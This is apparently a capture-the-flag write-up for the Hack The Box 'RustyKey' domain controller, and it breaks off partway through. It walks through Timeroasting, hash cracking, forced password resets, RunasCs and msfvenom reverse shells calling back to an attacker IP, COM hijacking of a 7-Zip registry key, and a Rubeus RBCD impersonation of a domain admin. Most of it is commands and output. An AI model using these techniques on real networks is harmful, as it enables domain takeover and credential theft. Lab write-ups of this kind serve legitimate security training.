# HTB | RustyKey Machine - IP - 10.129.100.71 Description - As is common in real life Windows pentests, you will start the RustyKey box with credentials for the following account: rr.parker / 8#t5HE8L!W3A ## NMAP ```java └─$ nmap -sC -sV -p 53,88,135,139,389,445,464,3269,5985,9389,47001,49664,49666,49670,49673,49674,49677,49692,56212 10.129.100.71 -Pn -oA nmap_port_details Starting Nmap 7.95 ( ) at 2025-06-29 11:18 IST Nmap scan report for 10.129.100.71 Host is up (0.82s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-29 13:48:45Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49673/tcp open msrpc Microsoft Windows RPC 49674/tcp open msrpc Microsoft Windows RPC 49677/tcp open msrpc Microsoft Windows RPC 49692/tcp open msrpc Microsoft Windows RPC 56212/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-06-29T13:49:44 |_ start_date: N/A |_clock-skew: 8h00m04s Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 87.84 seconds ``` ### SMB / LDAP ```java └─$ netexec smb 10.129.99.237 -u rr.parker -p '8#t5HE8L!W3A' SMB 10.129.99.237 445 10.129.99.237 [*] x64 (name:10.129.99.237) (domain:10.129.99.237) (signing:True) (SMBv1:False) (NTLM:False) SMB 10.129.99.237 445 10.129.99.237 [-] 10.129.99.237\\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED ``` We can see that the **NTLM** authentication is disabled, so we switch to **Kerberos** and successfully authenticate: ```java └─$ impacket-getTGT 'rustykey.htb/rr.parker:8#t5HE8L!W3A' Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in rr.parker.ccache ``` ```java └─$ netexec ldap 10.129.99.237 -u rr.parker -p '8#t5HE8L!W3A' -k LDAP 10.129.99.237 389 DC [*] None (name:DC) (domain:rustykey.htb) LDAP 10.129.99.237 389 DC [+] rustykey.htb\\rr.parker:8#t5HE8L!W3A ``` ### Bloodhound ```java └─$ bloodhound-python -u 'rr.parker' -p '8#t5HE8L!W3A' -d rustykey.htb -ns 10.129.100.71 -c All --zip ``` Got the list of usernames from the Bloodhound zip We can see the members of `Remote Management Users` group, so we can somewhat guess which account would have user flag, and we can manually explore with Inbound Object Control to check the Bloodhound/AD path to them
Now we have three options `EE.REED` , `GG.ANDERSON` and `BB.MORGAN`
`HELPDESK` -> ForceChangePassword -> `BB.MORGAN`
Now we need to find the way to get to `HELPDEK`
Now we have two options either get the credentials for `NN.MARCOS` or `IT-COMPUTER3` ## Foothold/ Shell ### Shell as BB.Morgan The path which will give us shell will look like `IT-COMPUTER3` - > `HELPDESK` - > `BB.MORGAN` #### **Timeroasting** Timeroast is a technique that abuses the NTP service on a domain controller to leak **MD5 password hashes** for domain user accounts. These hashes can be cracked offline to recover plaintext passwords. The attack targets the **Secure NTP (SNTP-MS)** mechanism that encrypts NTP responses based on a user’s password. There is a white paper for TimeRoasting (refer to [this](https://cybersecurity.bureauveritas.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf)), and this git [repo](https://github.com/SecuraBV/Timeroast) > Timeroasting takes advantage of Windows' NTP authentication mechanism, allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID. This is not a problem when computer accounts are properly generated, but if a non-standard or legacy default password is set this tool allows you to brute-force those offline. ```java └─$ python3 timeroast.py 10.129.60.209 1000:$sntp-ms$6b739430d088d593e0679f39c8e5d424$1c0111e900000000000a0fd44c4f434cec0ecfa8ee3acad7e1b8428bffbfcd0aec0ee487464b1fb9ec0ee487464b3588 1103:$sntp-ms$fc9850f29ca329477cde72d2dd1e93cf$1c0111e900000000000a0fd44c4f434cec0ecfa8ebd0020be1b8428bffbfcd0aec0ee487f7d7ce88ec0ee487f7d86587 1104:$sntp-ms$937ddfce9fed6efecf9dde5e20eb12ef$1c0111e900000000000a0fd44c4f434cec0ecfa8ebd165b8e1b8428bffbfcd0aec0ee487f7d97f62ec0ee487f7d9acaf 1105:$sntp-ms$02ee43305a252680f77bac8462b42639$1c0111e900000000000a0fd44c4f434cec0ecfa8ed4a1c83e1b8428bffbfcd0aec0ee48809313a34ec0ee4880931afa5 1107:$sntp-ms$3a4376d1bdff7a3ee53a97830cc90b50$1c0111e900000000000a0fd44c4f434cec0ecfa8ed5649b8e1b8428bffbfcd0aec0ee488093da221ec0ee488093dc202 1106:$sntp-ms$25240db6725293f421be71632df6c008$1c0111e900000000000a0fd44c4f434cec0ecfa8ed4b6a61e1b8428bffbfcd0aec0ee4880932aea8ec0ee4880932e961 1118:$sntp-ms$0a3aec69b5c387b26b0fb061efcfdbd4$1c0111e900000000000a0fd44c4f434cec0ecfa8ed53d138e1b8428bffbfcd0aec0ee488195bf345ec0ee488195c0fcb 1119:$sntp-ms$fa9c9efec37ec2e2ea7d786a03402e75$1c0111e900000000000a0fd44c4f434cec0ecfa8ed55d29ae1b8428bffbfcd0aec0ee488195dea96ec0ee488195e1635 1120:$sntp-ms$944d9fbf111f556e8c86bf1f0c97630f$1c0111e900000000000a0fd44c4f434cec0ecfa8ed6fdf8be1b8428bffbfcd0aec0ee4881977f935ec0ee48819781fcc 1121:$sntp-ms$ce4d5392114a433ea7b3c4935e71b9b2$1c0111e900000000000a0fd44c4f434cec0ecfa8ed7155ade1b8428bffbfcd0aec0ee488197972b2ec0ee488197995ee 1122:$sntp-ms$5a7fe7ac440a4563198972c761d9e176$1c0111e900000000000a0fd44c4f434cec0ecfa8ed99780be1b8428bffbfcd0aec0ee48819a19363ec0ee48819a1b84c 1123:$sntp-ms$19dd83d824166332e08a02bfb35df35b$1c0111e900000000000a0fd44c4f434cec0ecfa8ee6bd1e0e1b8428bffbfcd0aec0ee4882e6b7faaec0ee4882e6bf51b 1125:$sntp-ms$00b0a3277cb03b54f242668e11638d98$1c0111e900000000000a0fd44c4f434cec0ecfa8eea84380e1b8428bffbfcd0aec0ee4882ea821f2ec0ee4882ea855f4 1124:$sntp-ms$2f7e53fd9cf9aef37b13059a489cc4ab$1c0111e900000000000a0fd44c4f434cec0ecfa8ee6d2b7ce1b8428bffbfcd0aec0ee4882e6cffddec0ee4882e6d414b 1126:$sntp-ms$bf2b0f76de6ddcd79fee273626014758$1c0111e900000000000a0fd44c4f434cec0ecfa8eeb30b5ae1b8428bffbfcd0aec0ee4882eb2e9ccec0ee4882eb3212a 1127:$sntp-ms$8261b4ca39a936d18d871b5dc70e2b6d$1c0111e900000000000a0fd44c4f434cec0ecfa8eed1cce6e1b8428bffbfcd0aec0ee4882ed1a4a2ec0ee4882ed1df5b ``` we can get the sid of `IT-COMPUTER3` either from bloodhound or it’s json data ```java └─$ cat 20250702022932_computers.json | jq -r '.data[] | "\\(.Properties.samaccountname) \\(.ObjectIdentifier)"' IT-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1127 IT-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1126 IT-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1125 IT-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1124 IT-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1123 Finance-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1122 Finance-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1121 Finance-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1120 Finance-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1119 Finance-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1118 Support-Computer5$ S-1-5-21-3316070415-896458127-4139322052-1107 Support-Computer4$ S-1-5-21-3316070415-896458127-4139322052-1106 Support-Computer3$ S-1-5-21-3316070415-896458127-4139322052-1105 Support-Computer2$ S-1-5-21-3316070415-896458127-4139322052-1104 Support-Computer1$ S-1-5-21-3316070415-896458127-4139322052-1103 DC$ S-1-5-21-3316070415-896458127-4139322052-1000 ``` #### cracking hash We need to crack the hash for RID 1125 ```java └─$ hashcat -m 31300 sntp_hash /home/anurag/stuff/rockyou.txt --username ``` we get the password for `IT-Computer3$:Rusty88!` we can confirm the credential via netexec ```java └─$ netexec ldap 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb) LDAP 10.10.11.75 389 DC [+] rustykey.htb\\IT-Computer3$:Rusty88! ``` #### AddSelf to Helpdesk ```java └─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k add groupMember "HelpDesk" "IT-Computer3$" [+] IT-Computer3$ added to HelpDesk ``` Now we can change password for `bb.morgan` #### ForceChangePassword ```java └─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password bb.morgan 'P@ssw0rd@123' [+] Password changed successfully! ``` When we try to validate the new credentials, we get `KDC_ERR_ETYPE_NOSUPP` ```java └─$ netexec ldap 10.10.11.75 -u 'bb.morgan' -p 'P@ssw0rd@123' -k LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb) LDAP 10.10.11.75 389 DC [-] rustykey.htb\\bb.morgan:P@ssw0rd@123 KDC_ERR_ETYPE_NOSUPP ``` > `KDC_ERR_ETYPE_NOSUPP` error indicates that the KDC does not support the encryption type our tools are using for those accounts. Let’s look at the bloodhound result again We can see that `BB.MORGAN` -> MemberOf `IT` -> MemberOf -> `PROTECTED OBJECTS` -> MemberOf -> `PROTECTED USERS`
The key issue is likely the **`PROTECTED USERS` group**. Users in this group have **restrictions** that: 1. **Disallow the use of NTLM, Digest, and CredSSP**. 2. Only allow **Kerberos** with **AES encryption**. 3. Disallow delegation, including unconstrained delegation. This explains the `KDC_ERR_ETYPE_NOSUPP` error when using Kerberos with weak encryption or incompatible settings. Since `HELPDESK` -> AddMember -> `PROTECTED OBJECTS` -> MemberOf -> `PROTECTED USERS` We can remove `IT` from it and then we can change the password of `BB.MORGAN` and able to authenticate
```java ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k remove groupMember "Protected Objects" "IT" [-] IT removed from Protected Objects ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password bb.morgan 'P@ssw0rd@123' [+] Password changed successfully! ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ netexec ldap 10.10.11.75 -u 'bb.morgan' -p 'P@ssw0rd@123' -k LDAP 10.10.11.75 389 DC [*] None (name:DC) (domain:rustykey.htb) LDAP 10.10.11.75 389 DC [+] rustykey.htb\\bb.morgan:P@ssw0rd@123 ``` #### GetTgt for bb.morgan evil-wirm is not working so we need to get the tgt for `bb.morgan` ```java └─$ netexec smb DC.RUSTYKEY.HTB -u rr.parker -p '8#t5HE8L!W3A' -k --generate-krb5-file krb5.conf SMB DC.RUSTYKEY.HTB 445 DC [*] x64 (name:DC) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False) SMB DC.RUSTYKEY.HTB 445 DC [+] RUSTYKEY.HTB\\rr.parker:8#t5HE8L!W3A └─$ impacket-getTGT rustykey.htb/'bb.morgan':'P@ssw0rd@123' -k Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in bb.morgan.ccache ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ export KRB5CCNAME=bb.morgan.ccache ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ export KRB5_CONFIG=./krb5.conf ``` ```java └─$ evil-winrm -r rustykey.htb -i dc.rustykey.htb Evil-WinRM shell v3.7 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> ``` found `user.txt` ```java Directory: C:\\Users\\bb.morgan\\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 6/4/2025 9:15 AM 1976 internal.pdf -ar--- 7/2/2025 3:32 AM 34 user.txt ``` ## Privilege Escalation ### Shell as EE.Reed We can see there is a pdf `internal.pdf` let’s copy to our machine and open it ```java Internal Memo From: bb.morgan@rustykey.htb To: support-team@rustykey.htb Subject: Support Group - Archiving Tool Access Date: Mon, 10 Mar 2025 14:35:18 +0100 Hey team, As part of the new Support utilities rollout, extended access has been temporarily granted to allow testing and troubleshooting of file archiving features across shared workstations. This is mainly to help streamline ticket resolution related to extraction/compression issues reported by the Finance and IT teams. Some newer systems handle context menu actions differently, so registry-level adjustments are expected during this phase. A few notes: - Please avoid making unrelated changes to system components while this access is active. - This permission change is logged and will be rolled back once the archiving utility is confirmed stable in all environments. - Let DevOps know if you encounter access errors or missing shell actions. Thanks, BB Morgan IT Department ``` This memo mentions an archiving tool having unrestricted access for testing purposes. It notes that some context menus may not function correctly, and registry-level adjustments might be needed, indicating that the tool’s registry entries may have excessive permissions. `HELPDESK` can change passwords for `DD.ALI` , `EE.REED` AND `GG.ANDERSON` as well
Since the memo was sent to `SUPPORT` And we know that `EE.REED` is a member of `SUPPORT` and `HELPDEK` can change the password, but before that before, we need to remove `SUPPORT` from `PROTECTED OBJECT` ```java └─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k remove groupMember "Protected Objects" "SUPPORT" [-] SUPPORT removed from Protected Objects ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ bloodyAD -d RUSTYKEY.HTB --host DC --dc-ip 10.10.11.75 -u 'IT-Computer3$' -p 'Rusty88!' -k set password "ee.reed" 'P@ssw0rd@123' [+] Password changed successfully! ``` not able to auth via ldap but smb we get ```java └─$ impacket-getTGT rustykey.htb/'ee.reed':'P@ssw0rd@123' -k Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in ee.reed.ccache ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ export KRB5CCNAME=ee.reed.ccache ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ netexec smb DC.RUSTYKEY.HTB -u 'ee.reed' -p 'P@ssw0rd@123' -k SMB DC.RUSTYKEY.HTB 445 DC [*] x64 (name:DC) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False) SMB DC.RUSTYKEY.HTB 445 DC [-] RUSTYKEY.HTB\\ee.reed:P@ssw0rd@123 STATUS_LOGON_TYPE_NOT_GRANTED ``` > This error occurs because the domain join user account lacks the Access this computer from the network user right at the domain controller (DC) servicing the domain join operation. #### Reverse shell I tried PSsession but it gives error ```java *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> $password = ConvertTo-SecureString "P@ssw0rd@123" -AsPlainText -Force *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> $cred = New-Object System.Management.Automation.PSCredential("ee.reed", $password) *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> hostname dc *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> Enter-PSSession -ComputerName dc -Credential $cred You are currently in a Windows PowerShell PSSession and cannot use the Enter-PSSession cmdlet to enter another PSSession. At line:1 char:1 + Enter-PSSession -ComputerName dc -Credential $cred + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (:) [Enter-PSSession], ArgumentException + FullyQualifiedErrorId : RemoteHostDoesNotSupportPushRunspace,Microsoft.PowerShell.Commands.EnterPSSessionCommand *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> ``` we can use RunasC ```java *Evil-WinRM* PS C:\\Users\\bb.morgan\\Documents> .\\RunasCs.exe ee.reed P@ssw0rd@123 powershell -r 10.10.16.3:1234 [*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation. [*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token. [+] Running in session 0 with process function CreateProcessWithLogonW() [+] Using Station\\Desktop: Service-0x0-dc3160d$\\Default [+] Async process 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' with pid 21192 created in background. ``` ```java ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ nc -nlvp 1234 listening on [any] 1234 ... connect to [10.10.16.3] from (UNKNOWN) [10.10.11.75] 53867 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\\Windows\\system32> whoami whoami rustykey\\ee.reed PS C:\\Windows\\system32> ``` ### Shell as mm.turner #### Writable Registry We can use the below script to check for writable registry keys under `HKLM:\\SOFTWARE` ```java Get-ChildItem HKLM:\\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object { try { $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\\', '') $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true) $regKey.SetValue('TestWrite','1') $regKey.DeleteValue('TestWrite') $true } catch { $false } } ``` This gives us many registry for `7-zip` ```java Hive: HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000} Name Property ---- -------- InprocServer32 (default) : C:\\Program Files\\7-Zip\\7-zip.dll ThreadingModel : Apartment ``` We see that the `InprocServer32` registry has a **COM** server DLL pointing to `C:\\Program Files\\7-Zip\\7-zip.dll` that gets loaded into the client process when this CLSID is used. Checking the ACLs for this registry, we see that members of the **Support** domain group have full control over it: ```java PS C:\\temp> Get-Acl 'HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32' | fl Get-Acl 'HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32' | fl Path : Microsoft.PowerShell.Core\\Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-0001000 20000}\\InprocServer32 Owner : BUILTIN\\Administrators Group : RUSTYKEY\\Domain Users Access : APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow ReadKey BUILTIN\\Administrators Allow FullControl CREATOR OWNER Allow FullControl RUSTYKEY\\Support Allow FullControl NT AUTHORITY\\SYSTEM Allow FullControl BUILTIN\\Administrators Allow FullControl BUILTIN\\Users Allow ReadKey Audit : Sddl : O:BAG:DUD:AI(A;CIID;KR;;;AC)(A;ID;KA;;;BA)(A;CIIOID;KA;;;CO)(A;CIID;KA;;;S-1-5-21-3316070415-896458127-4139322 052-1132)(A;CIID;KA;;;SY)(A;CIIOID;KA;;;BA)(A;CIID;KR;;;BU) ``` #### COM Hijacking | Feature | **DLL Hijacking** | **COM Hijacking** | | --------------------- | --------------------------------------- | ------------------------------------------ | | **Target** | Executables and DLL loading | Registry-based COM class loading | | **Vector** | Search order abuse | Registry redirection of CLSID or ProgID | | **Persistence?** | No (unless abused in autostart apps) | Yes — hijacked COM objects persist | | **PrivEsc?** | Yes, if hijacked process runs as SYSTEM | Yes, if hijacked COM object runs as SYSTEM | | **Ease of detection** | Medium (DLL file on disk) | Harder — resides in the registry | | **Trigger Method** | App must load the DLL | COM object must be instantiated | We first generate a reverse shell payload in `.dll` format using `msfvenom`: ```java └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9001 -f dll -o shell.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 9216 bytes Saved as: shell.dll ``` We then transfer the payload to the target host and point the `InprocServer32` registry at the full path of the `.dll` file After few seconds, we get a reverse shell as the `mm.turner` user on our listener ```java PS C:\\temp> Set-ItemProperty -Path "HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32" -Name "(Default)" -Value "C:\\temp\\shell.dll" Set-ItemProperty -Path "HKLM:\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32" -Name "(Default)" -Value "C:\\temp\\shell.dll" PS C:\\temp> reg query "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32" reg query "HKLM\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32" HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\InprocServer32 (Default) REG_SZ C:\\temp\\shell.dll ThreadingModel REG_SZ Apartment PS C:\\temp> ``` ```java ┌──(anurag㉿anurag)-[~/htb/RustyKey] └─$ nc -nlvp 9001 listening on [any] 9001 ... connect to [10.10.16.3] from (UNKNOWN) [10.10.11.75] 57283 Microsoft Windows [Version 10.0.17763.7434] (c) 2018 Microsoft Corporation. All rights reserved. C:\\Windows>whoami whoami rustykey\\mm.turner C:\\Windows> ``` ### Shell as Administrator Looking at the bloodhound we know that `MM.TURNER` -> MemberOf `DELEGATIONMANAGER` -> AddAllowedToAct -> `DC.RUSTYKEY`
> The members of the group have can modify the msds-AllowedToActOnBehalfOfOtherIdentity attribute on the computer DC.RUSTYKEY.HTB. > > The ability to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property allows an attacker to abuse resource-based constrained delegation (RBCD) to compromise the remote computer system. We can either use a controlled user account that we can set an SPN for (`dd.ali`) or a controlled machine account (`IT-Computer3$`) for this attack. We also require the `Rubeus.exe` tool, since we're performing it from a Windows host: #### **RBCD Attack (Machine Account)** We first retreive the security identifier (SID) of the `IT-Computer3$` machine account: ```java PS C:\\temp> $ComputerSid = Get-DomainComputer IT-Computer3 -Properties objectsid | Select -Expand objectsid $ComputerSid = Get-DomainComputer IT-Computer3 -Properties objectsid | Select -Expand objectsid PS C:\\temp> ``` We then build a generic ACE with the SID as the principal(new DACL with `IT-Computer3$`’s SID that grants it `GenericAll` rights), and get the binary bytes for the new DACL/ACE, which will be needed for setting the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute. ```java PS C:\\temp> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" PS C:\\temp> $SDBytes = New-Object byte[] ($SD.BinaryLength) $SDBytes = New-Object byte[] ($SD.BinaryLength) PS C:\\temp> $SD.GetBinaryForm($SDBytes, 0) $SD.GetBinaryForm($SDBytes, 0) PS C:\\temp> ``` Next, we set this security descriptor in the `msDS-AllowedToActOnBehalfOfOtherIdentity` field of the domain controller This step **effectively allows `IT-Computer3$` to impersonate any user when accessing the DC**. ```java PS C:\\temp> Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} Get-DomainComputer DC | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} PS C:\\temp> ``` We then use `Rubeus` to hash the plaintext password of `IT-Computer3$` into its `RC4_HMAC` form: ```java PS C:\\tem> ./R.exe hash /password:Rusty88! ./R.exe hash /password:Rusty88! [*] Action: Calculate Password Hash(es) [*] Input password : Rusty88! [*] rc4_hmac : B52B582F02F8C0CD6320CD5EAB36D9C6 [!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types! PS C:\\tem> ``` Finally, we use the `s4u` module of `Rubeus` to get a service ticket for the `backupadmin` user, which is a member of Domain Admins: ```java PS C:\\tem> ./R.exe s4u /user:IT-Computer3$ /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/DC.rustykey.htb /nowrap ./R.exe s4u /user:IT-Computer3$ /rc4:B52B582F02F8C0CD6320CD5EAB36D9C6 /impersonateuser:backupadmin /msdsspn:cifs/DC.rustykey.htb /nowrap [*] Action: S4U [*] Using rc4_hmac hash: B52B582F02F8C0CD6320CD5EAB36D9C6 [*] Building AS-REQ (w/ preauth) for: 'rustykey.htb\\IT-Computer3$' [*] Using domain controller: fe80::d98:ec14:263a:b635%11:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIFmDCCBZSgAwIBBaEDAgEWooIEqDCCBKRhggSgMIIEnKADAgEFoQ4bDFJVU1RZS0VZLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMcnVzdHlrZXkuaHRio4IEYDCCBFygAwIBF6EDAgECooIETgSCBEqjI6o/cMuKnrnmTq+NiMN0NN2lU0sIo74gbw6ZEwn/S2YK/GfQ1Yten6pBi04c16ZYeNwSFqHyosjJoe8hWThHlq9SZH1x051T1CfEOub7ZNYNurzA6Qpy3c5CVji9ejD60zCtPi1uUw1g0UwXIRjPaPIsGgz4RQkgiYi/IN17DWkelc3dHCs/1sBHsSS3sGlVQGQyCcnIGZcHamMRqA3SW+wXwg0FyiQI5I9SUpLXB73OHnGxlWYvrKPTaQrocxciqtpii/WIdo7Z+FTO2d2vCcKiIGnW1mZu7rHsP2d9S+XtMBErMt3XKWQj1mId+9w1lqZEhL9FYhWpZ8ORamn1Dimq6MXxI9n8Up1S4iBcyIoUZOIEmGxu8+E7clzdppcwbc0vTN7AWwXQaVjGng2oDFf5mzoGyaAhJQ2/Lq6zQDbg+IbsUPE9KlQERn3bQuWrPOjIS1UlkgtwEYap5zDZW2wEiWNuCeOrKg9KCAcNZkJNjB8u+6ndL8bSzGujMAvHugtAjgGUHYKwG79JzJCn5uR6ZM2exm0deUwTv9L9off2yZ8ZafQ9zgXpB5c8dkZfZToCdQGkrqvaGeA6I14QIFGZISn0umw8n3xl7YGQUq208hWl65XpOKWPJCpxS34QsKOWkTsPrWbZS+K4oOGE3qvrXtDY8W1IjTPx3RX7BLiR9nFmtO0S45LHMCmzk4f5hIi3hjfR944wCTMFQvZe7U3ZmG5mU5dWl/E9QxjwjpFXaKH+IE2ouTVkmOEdHmxcp2Y4hnxuaYqLTt/GINdRCzXwrHRtF3NSpeIgAxSPz1ZSGUAwNFynGLLEvzcSwUg/eqmJsXvw4t1mpGPGGdFudY0+uIZLe8dj9xr98Sca4trIqWAQ16ob7YJ/1VDBHKC9QLUZ/sgAXosaHIRxYV6WZ5dZxQpGfjCR+XrVr9St+DkhgkenaiDjrKH61XznOURMa7oI/BcjSRJ1N9Yv3ODDaj1xzgCYZwiZrNjW2sI1z2JtuhC0RxIOzhifntI04mr8STQeuJPsGwtC9xL75TJxy6SVtomUW8S0wmOrDM8AuQe3RW3B0WPnr9I69Hp1H9QhXRetSpVYwT+fFeLcmFVrrRo2hheh4AQNXGbUdPM9B0Aeh88NEz8MIARdz1BmXEAMENGrszYNZMQJrHmtQE4acsZFfR6VLWPqkIJYQLCzAWD2Lx6w6A2cLsi/FTe3B2Yr/rbvbvfBmg6i9QKEoVn72DGDkraC7+veP6cMxLdG6T5BNcjcvkxrpSKzF5arby7PiWlUDa+dHV0/htEMtXIDVoHGBkoCdWGzDW7CGIpZQB44Q5NNRPj71chok4XxRIwSBmcv5GGHGK6OXpL3ZgNPG8H+N/pi9KQe5OzfAjJNfA5isv7LYuOdHU50YbYfEkCKLbyWq1pxCeTWDAxIZV0zs5eGQVeAYeBPh7ruyvBAiy0io1dysUSkHEijgdswgdigAwIBAKKB0ASBzX2ByjCBx6CBxDCBwTCBvqAbMBmgAwIBF6ESBBC/yFmSKrMGDouZMGNIWAcOoQ4bDFJVU1RZS0VZLkhUQqIaMBigAwIBAaERMA8bDUlULUNvbXB1dGVyMySjBwMFAEDhAAClERgPMjAyNTA3MDMyMjI4MzNaphEYDzIwMjUwNzA0MDgyODMzWqcRGA8yMDI1MDcxMDIyMjgzM1qoDhsMUlVTVFlLRVkuSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxydXN0eWtleS5odGI= [*] Action: S4U [*] Building S4U2self request for: 'IT-Computer3$@RUSTYKEY.HTB' [*] Using domain controller: dc.rustykey.htb (fe80::d98:ec14:263a:b635%11) [*] Sending S4U2self request to fe80::d98:ec14:263a:b635%11:88 [+] S4U2self success! [*] Got a TGS for 'backupadmin' to 'IT-Computer3$@RUSTYKEY.HTB' [*] base64(ticket.kirbi): 